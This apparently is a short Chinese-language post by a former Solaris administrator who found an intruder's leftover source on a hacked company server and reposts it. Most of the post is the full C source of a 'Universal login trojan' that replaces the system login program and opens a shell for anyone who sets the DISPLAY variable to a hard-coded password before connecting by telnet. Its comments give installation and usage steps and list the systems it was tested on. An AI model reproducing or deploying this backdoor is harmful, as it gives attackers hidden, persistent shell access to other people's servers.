木馬(Universal login trojan)原始碼
以前幹Solaris網管時,公司server被駭(我進公司不到一星期發現的,應該是我進去之前就被破台很久-_-|||),駭進來的人真的有點白目,竟然編譯完login.c檔案後,替換掉正常程序後也沒把原始碼刪除掉,也因此我得以一窺究竟(雖然我還是看不懂)。
留著或許有用或許沒用,反正也是今天整理舊檔案時發現的,就貼上來給大家看看吧:
/* * PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! * Universal login trojan by Tragedy/Dor * Email: rawpower@iname.com * IRC: [Dor]@ircnet * * Login trojan for pretty much any O/S... * Tested on: Linux, BSDI 2.0, FreeBSD, IRIX 6.x, 5.x, Sunos 5.5,5.6,5.7 * OSF1/DGUX4.0, * Known not to work on: * SunOS 4.x and 5.4... Seems the only variable passwd to login * on these versions of SunOS is the $TERM... and its passed via * commandline option... should be easy to work round in time * * #define PASSWORD - Set your password here * #define _PATH_LOGIN - This is where you moved the original login to * login to hacked host with... * from bourne shell (sh, bash) sh DISPLAY="your pass";export DISPLAY;telnet host * */ #include <stdio.h> #if !defined(PASSWORD) #define PASSWORD "xxx" #endif #if !defined(_PATH_LOGIN) # define _PATH_LOGIN "/dev/login" #endif main (argc, argv, envp):q int argc; char **argv, **envp; { char *display = getenv("DISPLAY"); if ( display == NULL ) { execve(_PATH_LOGIN, argv, envp); perror(_PATH_LOGIN); exit(1); } if (!strcmp(display,PASSWORD)) { system("/bin/sh"); exit(1); } execve(_PATH_LOGIN, argv, envp); exit(1); }
